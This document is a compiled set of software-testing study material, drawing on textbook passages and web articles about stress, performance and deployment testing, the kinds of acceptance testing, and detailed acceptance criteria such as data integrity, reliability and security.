a system. The role of the system designer is to make penetration cost more than the

value of the information that will be obtained.

17.7.3 Stress Testing

Earlier software testing steps resulted in thorough evaluation of normal program

functions and performance. Stress tests are designed to confront programs with

abnormal situations. In essence, the tester who performs stress testing asks: “How

high can we crank this up before it fails?”

Stress testing executes a system in a manner that demands resources in abnor-

mal quantity, frequency, or volume. For example, (1) special tests may be designed

that generate ten interrupts per second, when one or two is the average rate,

(2) input data rates may be increased by an order of magnitude to determine how

input functions will respond, (3) test cases that require maximum memory or other

resources are executed, (4) test cases that may cause thrashing in a virtual oper-

ating system are designed, (5) test cases that may cause excessive hunting for

disk-resident data are created. Essentially, the tester attempts to break the

program.

A variation of stress testing is a technique called sensitivity testing. In some situa-

tions (the most common occur in mathematical algorithms), a very small range of

data contained within the bounds of valid data for a program may cause extreme and

even erroneous processing or profound performance degradation. Sensitivity testing

attempts to uncover data combinations within valid input classes that may cause

instability or improper processing.

17.7.4 Performance Testing

For real-time and embedded systems, software that provides required function but

does not conform to performance requirements is unacceptable. Performance test-

ing is designed to test the run-time performance of software within the context of an

integrated system. Performance testing occurs throughout all steps in the testing

process. Even at the unit level, the performance of an individual module may be


uote:

“If you’re trying tofind true systembugs and youhaven’t subjectedyour software to areal stress test,then it’s high timeyou started.”

Boris Beizer

pre75977_ch17.qxd 11/27/08 6:09 PM Page 471

assessed as tests are conducted. However, it is not until all system elements are fully

integrated that the true performance of a system can be ascertained.

Performance tests are often coupled with stress testing and usually require both

hardware and software instrumentation. That is, it is often necessary to measure

resource utilization (e.g., processor cycles) in an exacting fashion. External instru-

mentation can monitor execution intervals, log events (e.g., interrupts) as they oc-

cur, and sample machine states on a regular basis. By instrumenting a system, the

tester can uncover situations that lead to degradation and possible system failure.

17.7.5 Deployment Testing

In many cases, software must execute on a variety of platforms and under more

than one operating system environment. Deployment testing, sometimes called

configuration testing, exercises the software in each environment in which it is to

operate. In addition, deployment testing examines all installation procedures and

specialized installation software (e.g., “installers”) that will be used by customers,

and all documentation that will be used to introduce the software to end users.

As an example, consider the Internet-accessible version of SafeHome software

that would allow a customer to monitor the security system from remote locations.

The SafeHome WebApp must be tested using all Web browsers that are likely to be

encountered. A more thorough deployment test might encompass combinations

of Web browsers with various operating systems (e.g., Linux, Mac OS, Windows).

Because security is a major issue, a complete set of security tests would be integrated

with the deployment test.


Test Planning and Management

Objective: These tools assist a software teamin planning the testing strategy that is chosen

and managing the testing process as it is conducted.

Mechanics: Tools in this category address test planning,test storage, management and control, requirementstraceability, integration, error tracking, and reportgeneration. Project managers use them to supplementproject scheduling tools. Testers use these tools to plantesting activities and to control the flow of information asthe testing process proceeds.

Representative Tools:4

QaTraq Test Case Management Tool, developed byTraq Software (www.testmanagement.com),“encourages a structured approach to test management.”

QADirector, developed by Compuware Corp.(www.compuware.com/qacenter), provides asingle point of control for managing all phases of thetesting process.

TestWorks, developed by Software Research, Inc.(www.soft.com/Products/index.html),contains a fully integrated suite of testing toolsincluding tools for test management and reporting.

OpensourceTesting.org(www.opensourcetesting.org/testmgt.php)lists a variety of open-source test management andplanning tools.

NI TestStand, developed by National Instruments Corp.(www.ni.com), allows you to “develop, manage,and execute test sequences written in anyprogramming language.”

SOFTWARE TOOLS

4 Tools noted here do not represent an endorsement, but rather a sampling of tools in this category.In most cases, tool names are trademarked by their respective developers.

pre75977_ch17.qxd 11/27/08 6:09 PM Page 472

http://www.testmanagement.com

http://www.compuware.com/qacenter

http://www.soft.com/Products/index.html

http://www.opensourcetesting.org/testmgt.php

http://www.ni.com

http://www.ni.com

acceptance testing

What is Acceptance Testing?

Acceptance testing, a testing technique performed to determine whether or not the software system has met the requirement specifications. The main purpose of this test is to evaluate the system's compliance with the business requirements and verify if it is has met the required criteria for delivery to end users.

There are various forms of acceptance testing:

• User acceptance Testing • Business acceptance Testing • Alpha Testing • Beta Testing

Acceptance Testing - In SDLC

The following diagram explains the fitment of acceptance testing in the software development life cycle.

DEFINITION

Acceptance Testing is a level of the software testing process where a system is tested for acceptability.

The purpose of this test is to evaluate the system’s compliance with the business requirements and assess whether it is acceptable for delivery.

When is it performed?

Acceptance Testing is performed after System Testing and before making the system available for actual use.

Who performs it?

• Internal Acceptance Testing (Also known as Alpha Testing) is performed by members of the organization that developed the software but who are not directly involved in the project (Development or Testing). Usually, it is the members of Product Management, Sales and/or Customer Support.

• External Acceptance Testing is performed by people who are not employees of the organization that developed the software.

o Customer Acceptance Testing is performed by the customers of the organization that developed the software. They are the ones who asked the organization to develop the software for them. [This is in the case of the software not being owned by the organization that developed it.]

o User Acceptance Testing (Also known as Beta Testing) is performed by the end users of the software. They can be the customers themselves or the customers’ customers.


TASKS

• Acceptance Test Plan o Prepare o Review o Rework o Baseline

• Acceptance Test Cases/Checklist o Prepare o Review o Rework o Baseline

• Acceptance Test o Perform

The acceptance test cases are executed against the test data or using an acceptance test script and then the results are compared with the expected ones.

Definition by ISTQB

• acceptance testing: Formal testing with respect to user needs, requirements, and business processes conducted to determine whether or not a system satisfies the acceptance criteria and to enable the user, customers or other authorized entity to determine whether or not to accept the system.

Acceptance Criteria

Acceptance criteria are defined on the basis of the following attributes

• Functional Correctness and Completeness • Data Integrity • Data Conversion • Usability • Performance • Timeliness • Confidentiality and Availability • Installability and Upgradability • Scalability • Documentation

Acceptance Test Plan - Attributes

The acceptance test activities are carried out in phases. Firstly, the basic tests are executed, and if the test results are satisfactory then the execution of more complex scenarios are carried out.

The Acceptance test plan has the following attributes:

• Introduction • Acceptance Test Category • operation Environment • Test case ID • Test Title • Test Objective • Test Procedure • Test Schedule • Resources

The acceptance test activities are designed to reach at one of the conclusions:

1. Accept the system as delivered 2. Accept the system after the requested modifications have been made 3. Do not accept the system

Acceptance Test Report - Attributes

The Acceptance test Report has the following attributes:

• Report Identifier • Summary of Results • Variations • Recommendations • Summary of To-DO List • Approval Decision

After the system test has corrected all or most defects, the system will be delivered to the user or customer for acceptance testing. Acceptance testing is basically done by the user or customer although other stakeholders may be involved as well. The goal of acceptance testing is to establish confidence in the system. Acceptance testing is most often focused on a validation type testing. Acceptance testing may occur at more than just a single level, for example:

• A Commercial Off the shelf (COTS) software product may be acceptance tested when it is installed or integrated.

• Acceptance testing of the usability of the component may be done during component testing.

• Acceptance testing of a new functional enhancement may come before system testing.

The types of acceptance testing are:

• The User Acceptance test: focuses mainly on the functionality thereby validating the fitness-for-use of the system by the business user. The user acceptance test is performed by the users and application managers.

• The Operational Acceptance test: also known as Production acceptance test validates whether the system meets the requirements for operation. In most of the organization the operational acceptance test is performed by the system administration before the system is released. The operational acceptance test may include testing of backup/restore, disaster recovery, maintenance tasks and periodic check of security vulnerabilities.

• Contract Acceptance testing: It is performed against the contract’s acceptance criteria for producing custom developed software. Acceptance should be formally defined when the contract is agreed.

• Compliance acceptance testing: It is also known as regulation acceptance testing is performed against the regulations which must be adhered to, such as governmental, legal or safety regulations.

• Alpha and beta testing : Alpha testing takes place at developers' sites, and involves testing of the operational system by internal staff, before it is released to external customers. Beta testing takes place at customers' sites, and involves testing by a group of customers who use the system at their own locations and provide feedback, before the system is released to other customers. The latter is often called “field testing”.

Alpha testing is mostly applicable for software’s developed for mass market i.e. Commercial off the shelf(COTS), feedback is needed from potential users. Alpha testing is conducted at developers site, potential users, members or developers organization are invited to use the system and report defects. Beta testing is also known as field testing, it is done by potential or existing users/customers at an external site without developers involvement, this test is done to determine that the software satisfies the end users/customers' needs. This testing is done to acquire feedback from the market.

Acceptance testing is performed after system testing is done and all or most of the major defects have been fixed. The goal of acceptance testing is to establish confidence in the delivered software/system that it meets the end user/customers requirements and is fit for use Acceptance testing is done by user/customer and some of the project stakeholders.

Acceptance testing is done in production kind of environment.

1. User Acceptance Testing

What is User Acceptance Testing?

User Acceptance testing is the software testing process where system tested for acceptability & validates the end to end business flow. Such type of testing executed by client in separate environment (similar to production environment) & confirm whether system meets the requirements as per requirement specification or not.

http://www.softwaretestingclass.com/user-acceptance-testing-what-why-how

UAT is performed after System Testing is done and all or most of the major defects have been fixed. This testing is to be conducted in the final stage of Software Development Life Cycle (SDLC) prior to system being delivered to a live environment. UAT users or end users are concentrating on end to end scenarios & typically involves running a suite of tests on the completed system.

The Acceptance testing is “black box” tests, means UAT users doesn’t aware of internal structure of the code, they just specify the input to the system & check whether systems respond with correct result.

User Acceptance testing also known as Customer Acceptance testing (CAT), if the system is being built or developed by an external supplier. The CAT or UAT are the final confirmation from the client before the system is ready for production. The business customers are the primary owners of these UAT tests. These tests are created by business customers and articulated in business domain languages. So ideally it is collaboration between business customers, business analysts, testers and developers. It consists of test suites which involve multiple test cases & each test case contains input data (if required) as well as the expected output. The result of test case is either a pass or fail.

Need of User Acceptance Testing:

Once a software has undergone Unit , Integration and System testing the need of Acceptance Testing may seem redundant. But Acceptance Testing is required because

1) Developers code software based on requirements document which is their "own" understanding of the requirements and may not actually be what the client needs from the software.

2) Requirements changes during the course of the project may not be communicated effectively to the developers.

What to Test in User Acceptance Testing?

• Based on the Requirements definition stage use cases the Test cases are created.

• Also the Test cases are created considering the real world scenarios for the application.

• The actual testing is to be carried out in environments that copy of the production environment. So in the type of testing is concentrating on the exact real world use of application.

• Test cases are designed such that all area of application is covered during testing to ensure that an effective User Acceptance Testing.

http://www.softwaretestingclass.com/category/black-box-testing/

What are the key deliverable of User Acceptance Testing?

The completion of User Acceptance Testing is the significant milestone for traditional testing method. The following key deliverable of User Acceptance Testing phase:

• Test Plan: This outlines the Testing Strategy • UAT Test cases: The Test cases help the team to effectively test the application

in UAT environment. • Test Results and Error Reports: This is a log of all the test cases executed and

the actual results. • User Acceptance Sign-off: This is the system, documentation, and training

materials have passed all tests within acceptable margins. • Installation Instructions: This is document which helps to install the system in

production environment. • Documentation Materials: Tested and updated user documentation and training

materials are finalized during user acceptance testing

UAT directly involves the intended users of the software. UAT can be implemented by making software available for a free beta trial on the Internet or through an in-house testing team comprised of actual software users. Following are the steps involved in in-house UAT:

• Planning: The UAT strategy is outlined during the planning step.

• Designing test cases: Test cases are designed to cover all the functional scenarios of the software in real-world usage. They are designed in a simple language and manner to make the test process easier for the testers.

• Selection of testing team: The testing team is comprised of real world end-users.

• Executing test cases and documenting: The testing team executes the designed test cases. Sometimes it also executes some relevant random tests. All bugs are logged in a testing document with relevant comments.

• Bug fixing: Responding to the bugs found by the testing team, the software development team makes final adjustments to the code to make the software bug-free.

• Sign-off: When all bugs have been fixed, the testing team indicates acceptance of the software application. This shows that the application meets user requirements and is ready to be rolled out in the market.

UAT is important because it helps demonstrate that required business functions are operating in a manner suited to real-world circumstances and usage.

2. Operational Acceptance Testing

The Operational Acceptance test: also known as Production acceptance test validates whether the system meets the requirements for operation. In most of the organization the operational acceptance test is performed by the system administration before the system is released. The operational acceptance test may include testing of backup/restore, disaster recovery, maintenance tasks and periodic check of security vulnerabilities.

The purpose of OAT is to prove the aspects of the system that do not affect the functionality but can still have a profound effect on how it is managed and supported. OAT concentrates on areas such as resiliency, recoverability, integrity, manageability and supportability, with the specific exclusions of Performance, Security and Disaster Recovery, which are areas of speciality in their own right. The required level of OAT is determined by using CDRM (Change Driven Risk Management) and the output from this will recommend the risk mitigation strategy for all phases of the project. This will enable the OAT phase to focus on mitigating the operational risks.

The following mitigation methods form the OAT phase:

• Backup & Recovery • Change Implementation • Change Back-out • Component Failure • Shutdown & Resumption • Operational Support & Procedure • Alerts

All methods must be performed based on the CDRM technique and TS standards in a managed non-functional test environment that is an accurate reflection of production.

http://www.scriptrock.com/blog/operational-acceptance-testing

Categories of OAT

Backup & Recovery To prove both the backup and recovery processes. The testing will prove the operation, operability and integrity of backup procedures to ensure that the operating systems and data can be restored successfully at the same site and also at another site if applicable. The recovery testing includes the build and configuration of a component. These tests will ensure build quality and guarantee subsequent builds of components are to the same standard.

The testing should prove that:

• Service can be restored to an agreed recovery point utilising appropriate TS standard backup and restore methods.

• Backups taken at one site can be recovered to the same site.

• Backups taken at one site can be recovered to another other site.

Change Implementation To prove that the implementation into the production environment will be successful and not adversely affect the existing production services.


• The implementation into the live production environment will not adversely affect the integrity of the current production services.

• The implementation process can be replicated by using valid documentation that includes the time required for each step and the order of implementation.

Change Back-out To prove the back-out of a failed change from the production environment will be successful and will not adversely affect existing production services.


• All the required steps to successfully back out a change are valid.

• The time required for each step of the back-out is known and documented.

Component Failure To prove that the infrastructure has been designed to cope with unplanned outages. Following failure and repair, the failed components should be able to be recovered into the infrastructure in line with TS Recovery Management processes and timescales.


• The service can continue after the failure of individual components (outside its core operating environment), while issuing appropriate error messages. The system should be designed to offer transparent failover where possible and upon terminal error on the active platform (usually identified by a heartbeat failure), the failover infrastructure should be automatically activated. Ultimately, this covers the ability to continue operation at an alternative facility after the failure at the primary facility. This should be proven for new and amended components.

• The system can automatically adjust itself to availability of system resources.

• If fail-over is invoked, fail-back can be performed successfully and recovery to the original state is achievable. When component failures are resolved the service should fully recover itself with no customer impact. Any non-automated actions should be documented.

• If several components have been affected by a failure, there should be a proven plan showing the recommended order of restart, time to complete, etc.

• Failure to complete a unit of work does not result in data corruption or inconsistency and all services must handle any failures while preserving data integrity.

• Any impact on the E2E service by the failure of individual components is understood and documented.

Shutdown & Resumption To prove that the system can be shutdown and restarted cleanly without service disruption or within an agreed window of scheduled downtime.


• Each component can be shutdown and resumed successfully within the agreed time scale.

• The order of resumption of the components, if applicable, is valid and documented.

Operational Support & Procedure To prove that all components of a service are capable of being supported to TS standards. The testing should prove that:

• Diagnostic information produced in failure situations is of sufficient quality to support any manual or, ideally, automatic corrective actions.

• Any recovery documentation produced or amended, including Service Diagrams, is valid. This should be handed over to the relevant support areas.

• Documentation for each element which covers restart / recovery, error conditions, alerts, etc. must be provided.

• Full remote control capability to resolve error conditions should be proven for all new components and tools.

• Maintenance of the components should be able to be performed without disruption to the service or within an agreed outage as per the SLA. The service should be able to be started, shutdown and controlled to support maintenance.

Alerts To prove that alerts are raised in the event of a component failure, error condition or if a threshold is breached.


• Event Monitoring - All critical alerts go to the TEC and reference the correct resolution document. Any system that fails at an infrastructure or application level alerts on failure or is addressed by Heartbeat functionality.

• Threshold Monitoring - Alerts are in place and issued if agreed thresholds are exceeded. e.g. disk utilisation, CPU, memory etc.

• Heartbeat Monitoring (End to End) - This mimics customer experience on a regular basis. An alert will be issued if response times fall below a predetermined (by the business) threshold or fail an agreed number of times consecutively. The object of the heartbeat is to prove that key business functionality is available and performing to an acceptable standard. If end-to-end heartbeat is not appropriate, then component heartbeats should be applied.

3. Contract Acceptance Testing

Contract acceptance testing can take place either before a service goes live, or after it has been live for a pre-determined period. The tests demonstrate that the supplier has met the stated requirements of the contract. Normally payment is linked to succesfully passing the acceptance tests.

When conducted after a service is live, the contract usually references a service level agreement (SLA), which describes the service delivered rather than the mechanism by which the service is delivered.

Acceptance Testing

14.1 TYPES OF ACCEPTANCE TESTING

A product is ready to be delivered to the customer after the system test groupis satisfied with the product by performing system-level tests. Customers executeacceptance tests based on their expectations from the product. The services offeredby a software product may be used by millions of users. For example, the serviceprovider of a cellular phone network is a customer of the software systems runningthe phone network, whereas the general public forms the user base by subscribingto the phone services. It is not uncommon for someone to have a dual role as acustomer and a user. The service provider needs to ensure that the product meetscertain criteria before the provider makes the services available to the generalpublic. Acceptance testing is a formal testing conducted to determine whether asystem satisfies its acceptance criteria—the criteria the system must satisfy to beaccepted by the customer. It helps the customer to determine whether or not toaccept the system [1]. The customer generally reserves the right to refuse to takedelivery of the product if the acceptance test cases do not pass. There are twocategories of acceptance testing:

• User acceptance testing.

• Business acceptance testing.

The UAT is conducted by the customer to ensure that system satisfies thecontractual acceptance criteria before being signed off as meeting user needs. Actualplanning and execution of the acceptance tests do not have to be undertaken directlyby the customer. Often third-party consulting firms offer their services to do thistask. However, the customer must specify the acceptance criteria for the third partyto seek in the product. The BAT is undertaken within the development organization


450

14.2 ACCEPTANCE CRITERIA 451

of the supplier to ensure that the system will eventually pass the UAT. It is arehearsal of UAT at the premises of the supplier. The development organizationof the supplier derives and executes test cases from the client’s contract, whichinclude the acceptance criteria.

The acceptance criteria must be defined and agreed upon between the sup-plier and the customer to avoid any kind of protracted arguments. Either party ora third-party consulting firm may design the acceptance test plan. The acceptancecriteria document is a part of the contract in the case of an outsourced develop-ment under the OEM agreement. If some hardware is an integral part of the system,then the hardware acceptance criteria are included in the contractual agreement. Ingeneral, the marketing organization of the buyer defines the acceptance criteria.However, it is important that the software quality assurance team of the buyer’sorganization initiate a dialogue with the seller and provide a set of “straw man”acceptance criteria for the marketing department to review and react to. The users,the system engineers, customer support engineers, and the software quality assur-ance group of the buyer’s organization do the actual planning and execution of theacceptance tests after the criteria are agreed upon. The personnel developing anacceptance test plan must have a thorough understanding of the acceptance criteriathat have been agreed upon. It is unlikely that the system passes all the acceptancecriteria in one go for large, complex systems. It is useful to focus on the followingthree major objectives of acceptance testing for pragmatic reasons:

• Confirm that the system meets the agreed-upon criteria. The broad cate-gories of criteria are explained in Section 14.2.

• Identify and resolve discrepancies, if there are any. The sources of dis-crepancies and mechanisms for resolving them have been explained inSection 14.5.

• Determine the readiness of the system for cut-over to live operations. Thefinal acceptance of a system for deployment is conditioned upon the out-come of the acceptance testing. The acceptance test team produces anacceptance test report which outlines the acceptance conditions. The detailsof an acceptance test report have been explained in Section 14.6.

Acceptance testing is only one aspect of the contractual fulfillment of theagreement between a supplier and a buyer. A contractual agreement may requirethe seller to provide other materials, such as the design solution document thataddresses the requirement document of the buyer. The acceptance test team mayevaluate the acceptability of the system design in terms of graphical user interface,error handling, and access control.

14.2 ACCEPTANCE CRITERIA

At the core of any contractual agreement is a set of acceptance criteria. A keyquestion is what criteria must the system meet in order to be acceptable? Theacceptance criteria must be measurable and, preferably, quantifiable. The basic

452 CHAPTER 14 ACCEPTANCE TESTING

principle of designing the acceptance criteria is to ensure that the quality of thesystem is acceptable. One must understand the meaning of the quality of a system,which is a complex concept. It means different things to different people, and it ishighly context dependent [2].

Even though different persons may have a different view about quality, it isthe customer’s opinion that prevails. The concept of quality is, in fact, complex andmultifaceted [3]. Five views of quality, namely, transcendental view , user view ,manufacturing view , product view , and value-based view , have been explainedin Chapter 17. The five views were originally presented by Garvin [3] in thecontext of production and manufacturing in general and subsequently explained byKitchenham and Pfleeger [2] in a software development context. The five viewsare presented below in a concise form:

1. The transcendental view sees quality as something that can be recognizedbut is difficult to describe or define.

2. The user view sees quality as satisfying the purpose.

3. The manufacturing view sees quality as conforming to the specification.

4. The product view ties quality with the inherent characteristics of theproduct.

5. The value-based view puts a cost figure on quality—the amount a cus-tomer is willing to pay for it.

Acceptance criteria are defined on the basis of these multiple facets ofquality attributes. These attributes determine the presence or absence of qualityin a system. Buyers, or Customers, should think through the relevance andrelative importance of these attributes in their unique situation at the timeof formulating the acceptance criteria. The attributes of quality are discussedbelow and examples of acceptance criteria for each quality attribute aregiven.

Functional Correctness and Completeness One can ask the question: Doesthe system do what we want it to do? All the features which are described in therequirements specification must be present in the delivered system. It is importantto show that the system works correctly under at least two to three conditions foreach feature as a part of acceptance.

One can show the functional correctness of a system by using the require-ments database, as discussed in Chapter 11. The database is used in generating arequirement traceability matrix during system-level testing. Basically a traceabil-ity matrix tells us the test cases that are used to verify a requirement and all therequirements that are partially verified by a test case. Such a traceability matrixis a powerful tool in showing the customer about the functional correctness ofthe system. It is important to obtain an early feedback from the customer on therequirements traceability matrix. The idea behind the feedback is to reach an agree-ment on the validation method to be employed for each requirement. The decisionis especially significant because some validation methods are easier to implement


and less time intensive than other methods. For example, the demonstration methodis less time intensive than the testing method.

In reality, rigorous functional correctness testing is conducted during thesystem testing phase, rather than during acceptance testing. However, the buyermay ask for the requirement traceability matrix before the start of acceptance testingto ensure that the system does function according to the requirement specification.

Accuracy The question is: Does the system provide correct results? Accuracymeasures the extent to which a computed value stays close to the expected value.Accuracy is generally defined in terms of the magnitude of the error. A smallgap—also called an error in numerical analysis, for example—between the actualvalue computed by a system and the expected value is generally tolerated in acontinuous space. The accuracy problem is different in discrete space, leading tofalse-positive and false-negative results. False positives and false negatives areserious drawbacks in any diagnostic and monitoring software tools.

Data Integrity Data integrity refers to the preservation of the data while it istransmitted or stored such that the value of data remains unchanged when the cor-responding receive or retrieve operations are executed at a later time. Thus, datamust not be compromised by performing update, restore, retrieve, transmit, andreceive operations. The requirement of data integrity is included in the acceptancetest criteria to uncover design flaws that may result in data corruption. In commu-nication systems, an intruder can change the data without the sender and receiverdetecting the change. If integrity check mechanisms are in place, the data may bechanged, but the mechanism will detect the tampering. Data integrity mechanismsdetect changes in a data set. The concepts of message digest and digital signatureare used in preserving data integrity [4].

Remark. A message digest algorithm takes in an input message of arbitrary lengthand produces a fixed-length code. The fixed-length code is called a digest of theoriginal message. The commonly used message digest algorithms are the MessageDigest 5 (MD5) and the Secure Hash Algorithm 1 and 2 (SHA-1 and SHA-2).

Remark. A digital signature is an encrypted message digest that is appended to adocument to be stored or transmitted. A message digest is obtained by using, forexample, the MD5, SHA-1, or SHA-2 algorithm. The message digest is encryptedwith the private key of the party that stores or transmits the message.

Data Conversion Data conversion is the conversion of one form of computerdata to another. For example, conversion of a file from one version of MicrosoftWord to an earlier version for the sake of those who do not have the latest versionof Word installed. Data conversion testing is testing of programs or proceduresthat are used to convert data from existing systems for use in replacement systems.Data may be converted into an invalid format that cannot be processed by thenew system if this is not performed properly; thus the data will have no value.


In addition, data may be omitted from the conversion process resulting in gaps orsystem errors in the new system. Inability to process backup or archive files resultsin the inability to restore or interrogate old data.

An acceptance criterion for data conversion measures and reports the capa-bility of the software to convert existing application data to new formats. Thefollowing questions must be answered in specifying the data conversion acceptancecriteria:

• How can we undo a conversion and roll back to the earlier database ver-sion(s) if necessary?

• How much human involvement is needed to validate the conversion results?

• How are the current data being used and how will the converted data beused?

• Will the data conversion software conduct integrity checking as well?

Backup and Recovery Backup and recovery of data are default functionalitiesof large, complex systems. This is because, though systems are not expected tocrash, in reality, a system crash is not uncommon. The backup and recovery accep-tance criteria specify the durability and recoverability levels of the software in eachhardware platform. The aim of the recovery acceptance test criteria is to outline theextent to which data can be recovered after a system crash. The following questionsmust be answered in specifying the recoverability acceptance criteria:

• How much data can be recovered after a crash and how?

• Is the recovered data expected to be consistent?

Generally, a system cannot recover from a crash unless the data have beenpreviously backed up. The backup process includes taking periodic snapshots of astate of the system and saving them in stable storage to be retrieved later [5]. Thefollowing questions must be answered in specifying the backup acceptance criteria:

• How frequently is the backup process initiated?

• How long does the backup process take?

• Is the backup expected to work on-line or off-line with normal operationsuspended during backup?

• Does the backup process check if sufficient storage space is available toaccommodate all the data?

• Is the backup process fully automated?

Competitive Edge The system must provide a distinct advantage over existingmethods and competing products through innovative features. An analysis of thecompetitiveness of the product is provided to the buyer. This document contains acomparative study of the system with products available in the market from othervendors. A competitive analysis is conducted by the systems engineering group


of the marketing organization. The following questions need to be answered inspecifying the competitive analysis report acceptance criteria:

• What are the nearest direct competitors of the product?

• What are the indirect competitors of the product?

• Who are the potential competitors?

• Is the business in the product area steady, growing, or declining?

• What can be learned from product operations or from advertisements ofcompetitors?

• What are the strengths and weaknesses of competitors?

• How do their products differ from the product being developed?

Usability The question is: How easy it is to use the system and how easy it isto learn? The goal of usability acceptance criteria is to ensure that the system isflexible, it is easy to configure and customize the system, on-line help is available,work-around is available, and userinterface is friendly. The following questionsneed to be addressed in specifying the usability acceptance criteria:

• How will the system help the user in the day-to-day job?

• Will the productivity, customer satisfaction, reliability, and quality of worklife of the user improve by using the system?

• Are the menus, commands, screens, and on-line help clear to a typicaluser?

• Are the user procedures simple, logical, and clear to the typical user?

• Is the user guide clear, easy to access, and understandable for a typicaluser?

• Will the methods of error and exception handling utilized by the systemincrease reliability and productivity?

• Are the reports generated by the system in order, consistent, and clear?

• Is the system easy to install?

Performance The desired performance characteristics of the system must bedefined for the measured data to be useful. The following questions relate to spec-ification of the performance acceptance criteria:

• What types of performance characteristics of the system need to bemeasured?

• What is the acceptable value for each performance parameter?

• With what external data source or system does the application interact?

• What kind of workload should be used while running the performancetests? The workload should be a representative of the likely real-worldoperating condition in terms of low load, average load, and peak load.


• Is it required to perform a before-and-after comparison of the performanceresults with the prior version of the system?

Start-Up Time The system start-up time reflects the time taken to boot upto become operational. The following questions address the start-up acceptancecriteria:

• How is the start-up time defined?

• Does the start-up time include the power-on self-test of all the systemhardware?

• What is the longest acceptable start-up time?

Stress The system should be capable of handling extremely high or stressfulload. It is necessary to identify the system limitations and then stress the system tofind the results when the system is pushed to the border and beyond. The systemlimitation must be identified in the acceptance criteria. The following questionsmust be addressed in specifying the stress acceptance criteria:

• What are the design limits of the system?

• What is the expected and acceptable behavior of the recovery mechanism?

• What test environment, close to customer deployment architecture, isneeded in order to force the system to be stressed?

Reliability and Availability Software reliability is defined as the probabilitythat the software executes without failure for a specified amount of time in aspecified environment. The longer a system runs without failure, the more reliableit is. A large number of reliability models are available to predict the reliabilityof software. A software reliability model provides a family of growth curves thatdescribe the decline of failure rate as defects are submitted and closed duringthe system testing phase. The failure rate is often calculated in terms of MTBF.A growth model can answer the following questions, which can be part of thereliability acceptance criteria:

• What is the current failure rate of the software?

• What will be the failure rate if the customer continues acceptance testingfor a long time?

• How many defects are likely to be in the software?

• How much testing has to be performed to reach a particular failure rate?

The failure rate goal that is acceptable must be set separately for each levelof problem severity—from critical to low . A customer may be willing to toleratetens of low-severity issues per day but not more than one critical problem ina year.

System availability consists of proactive methods for maximizing serviceuptime, for minimizing the downtime, and for minimizing the time needed to


recover from an outage. Downtime is measured in terms of MTTR. The cre-ation of a customer environment is facilitated by gathering an operational profilefrom the customer. An operational profile describes the ways the system is tobe used. One can uncover several deficiencies in the system while tuning theparameters of the system; parameter tuning will improve system availability level.Customers must be willing to share the operational profile of their computingenvironment to improve the target availability level, which may be proprietaryinformation.

Maintainability and Serviceability The maintainability of a system is its abilityto undergo repair and evolution. One way to characterize maintainability is tomeasure the MTTR, which reflects the time it takes to analyze a corrective defect,design a modification, implement the change, test it, and distribute it. The importantfactors, from a customer’s perspective, is the responsiveness of the service ratherthan the internal technical maintainability of the system. The following are usefulacceptance criteria from a customer’s perspective:

• The customer is the final arbiter of setting the severity of a system problem.If the customer calls a problem critical, it must be fixed immediately.

• If a system problem is assessed as critical by the customer, then staff mustbe assigned to work on resolving the problem immediately with utmostpriority.

• If the severity of a system problem is assessed as high by the customer,then staff must be assigned to work on resolving the problem during nor-mal business hours until it is resolved or until a work-around has beendelivered as an interim solution. The staff responsible for resolving theproblem must ensure that there is significant effort made toward resolvingthe problem. However, they may spend time on other activities as prioritiesdictate.

• If a system problem is assessed as low by the customer, then staff must beassigned to work on resolving the problem during normal business hoursas time permits. If the problem solution involves a software change, itwill normally wait until the next software release has been implemented toprovide the resolution.

• All the critical- and high-severity fixes must work 100% when installed.

Serviceability is closely related to maintainability of the system, which aredesigned to ensure the correctness of the tools that are used to diagnose and servicethe system. For example, the software may need to be serviced remotely via anInternet connection. Diagnostic utilities are used to monitor the operation and thecause of any malfunction. The following questions must be addressed in specifyingthe serviceability acceptance criteria:

• What kind of tools will be available for servicing the system?

• How should these tools be used?


Robustness The robustness of a system is defined as its ability to recover fromerrors, continue to operate under worst conditions, and operate reliably for anextended period of time. The following questions must be addressed in specifyingthe robustness acceptance criteria:

• What are the types of errors from which the system is expected to recover?

• What are the causes, or sources, of the errors so that these can be simulatedin a test environment?

• How are the errors initiated, or triggered, in the real world?

• What types of corrective and recovery actions are required for each typeof error?

• What kinds of disasters can strike? What are those scenarios?

• What is an acceptable response to each of these identified scenarios?

• What is the recovery mechanism for each of the scenarios? Is it workable,understood, and accepted?

• How can disaster be simulated in order to test recovery?

Timeliness Time to market is an important aspect of any contractual agreement.The supplier must be able to deliver the system to the buyer within the time frameagreed upon. Rewards and penalties are associated with the timeliness acceptancecriteria as follows:

• If coding is completed on time, the buyer will reward 5% extra money ontop of the contractual agreement.

• If system-level testing is completed on time, the buyer will reward 10%extra money on top of the contractual agreement.

• For every week of delay in completing the system tests, the supplier hasto pay 2% penalty on top of the contractual agreement, with a maximumof 20% penalty.

Confidentiality and Availability The confidentiality acceptance criteria reterto the requirement that the data must be protected from unauthorized disclosureand the availability acceptance criteria to the requirement that the data must beprotected from a denial of service (DoS) to authorized users. Different types ofpossible confidentiality and availability acceptance criteria are as follows:

• No unauthorized access to the system is permitted, that is, user authenti-cation is performed.

• Files and other data are protected from unauthorized access.

• The system is protected against virus, worm, and bot attacks.

• Tools are available for detecting attacks.

• There is support against DoS attack.

• Privacy in communication is achieved by using encryption.


• All the customer data must be stored in a secure place in accordance withthe policies of customer right, such as confidentiality.

Remark. A worm is defined as a software component that is capable of, under itsown means, infecting a computer system in an automated fashion. On the otherhand, a virus spreads rapidly to a large number of computers. However, it cannotdo so with its own capability; it spreads using the assistance of another program.

Remark. A bot is a software agent. A bot interacts with other network servicesintended for people as if it were a person. One typical use of bots is to gatherinformation. Another more malicious use for bots is the coordination and operationof an automated attack on networked computers, such as a distributed DoS attack.

Compatibility and Interoperability The compatibility of a system is definedas the ability to operate in the same way across different platforms and networkconfigurations and in the presence of different mixes of other applications. On theother hand, the interoperability of a system is defined as the ability to interfacewith other network elements and work correctly as expected. The major challengeis in determining the platforms, configurations, and other applications with whichthe system is compatible. The following questions must be addressed in specifyingthe compatibility and interoperability acceptance criteria:

• What are the platforms, or configurations, on which the system mustoperate?

• Does the system have to work exactly the same way across different con-figurations? If not, what are the acceptable variations?

• What are the applications that must coexist with the system?

• With what network elements must the system interoperate?

Compliance The system should comply with the relevant technical standards,such as the IEEE standards, operating system interface standards, and the IP stan-dards. In addition, the system should comply with regulatory requirements asestablished by external agencies. The following questions must be addressed inspecifying the acceptance criteria for compliance:

• With what technical standards should the system comply? Are there anyexceptions to these standards? If yes, specify the exceptions.

